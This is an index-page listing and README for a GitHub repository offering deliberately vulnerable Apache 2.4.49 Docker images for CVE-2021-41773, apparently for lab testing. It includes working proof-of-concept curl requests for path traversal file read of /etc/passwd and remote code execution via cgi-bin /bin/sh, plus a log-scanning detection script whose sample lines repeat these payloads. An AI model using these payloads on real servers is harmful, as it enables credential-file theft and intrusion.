Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/BlueTeamSteve/CVE-2021-41773
Vulnerable docker images for CVE-2021-41773
- Host: GitHub
- URL: https://github.com/BlueTeamSteve/CVE-2021-41773
- Owner: BlueTeamSteve
- Created: 2021-10-06T14:47:23.000Z (about 3 years ago)
- Default Branch: main
- Last Pushed: 2021-10-06T15:07:48.000Z (about 3 years ago)
- Last Synced: 2024-08-05T17:40:45.932Z (4 months ago)
- Homepage:
- Size: 182 KB
- Stars: 21
- Watchers: 1
- Forks: 6
- Open Issues: 0
Metadata Files:
- Readme: README.MD
Awesome Lists containing this project
- awesome-hacking-lists - BlueTeamSteve/CVE-2021-41773 - Vulnerable docker images for CVE-2021-41773 (Others)
README
# Vulnerable docker images for CVE-2021-41773 Apache path traversal
This vulnerability *only* applies to version 2.4.49 with specific non-default configs. In certain situations this can result in either file read or code execution.
![tweet](./img/ptswarm.png)
[https://twitter.com/ptswarm/status/1445376079548624899](https://twitter.com/ptswarm/status/1445376079548624899)
## Vulnerable file read config
Containers can be pulled directly from Docker Hub using
```docker pull blueteamsteve/cve-2021-41773:no-cgid```
and executed using
```docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid```
The Apache logs can be viewed using the command below, or just exclude the "-dit" from the above run command to stream stdio
```docker logs <container-id>```
### PoC for file read
```curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd```
## Vulnerable RCE config
Containers can be pulled directly from Docker Hub using
```docker pull blueteamsteve/cve-2021-41773:with-cgid```
and executed using
```docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:with-cgid```
The Apache logs can be viewed using the command below, or just exclude the "-dit" from the above run command to stream stdio
```docker logs <container-id>```
### PoC for RCE
```curl 'localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id'```
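To find the two PoC requests above in the container's `docker logs` output, this added example (not part of the original README) scans access-log lines for path segments that only become `..` after percent-decoding. It assumes Apache's common log format; the sample lines, status codes and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache common log format (not captured from a real server).
SAMPLE_LOG = """\
172.17.0.1 - - [06/Oct/2021:15:10:01 +0000] "GET /index.html HTTP/1.1" 200 45
172.17.0.1 - - [06/Oct/2021:15:10:07 +0000] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 200 926
172.17.0.1 - - [06/Oct/2021:15:10:15 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 200 54
172.17.0.1 - - [06/Oct/2021:15:10:20 +0000] "GET /cgi-bin/%2E%2E/%2E%2E/etc/shadow HTTP/1.1" 403 199
172.17.0.1 - - [06/Oct/2021:15:10:31 +0000] "GET /docs/v2.4/../index.html HTTP/1.1" 200 45
"""

# Assumed layout: %h %l %u %t "%r" %>s %b  -> client, method, raw target, status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def fully_decode(text, max_rounds=3):
    """Percent-decode repeatedly so nested encodings are also exposed."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def encoded_dotdot(target):
    """True if a path segment is not literally '..' but decodes to '..'."""
    path = target.split("?", 1)[0]  # ignore the query string
    return any(seg != ".." and fully_decode(seg) == ".." for seg in path.split("/"))

def scan(log_text):
    """Return (client, method, target, status) for each request with an encoded '..' segment."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and encoded_dotdot(m.group(3)):
            hits.append((m.group(1), m.group(2), m.group(3), int(m.group(4))))
    return hits

if __name__ == "__main__":
    for client, method, target, status in scan(SAMPLE_LOG):
        outcome = "served" if 200 <= status < 300 else "rejected"
        print(f"{client} {method} {target} -> {status} ({outcome})")
```

A hit with a 2xx status means the server answered the traversal request; a POST hit under `/cgi-bin/` corresponds to the code-execution variant.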
## Build custom docker containers
Modify and build your own versions using the dockerfile and template httpd.conf files in the subdirectories
- Use ./no-cgi for the config vulnerable to file read
- Use ./with-cgi for the config vulnerable to code execution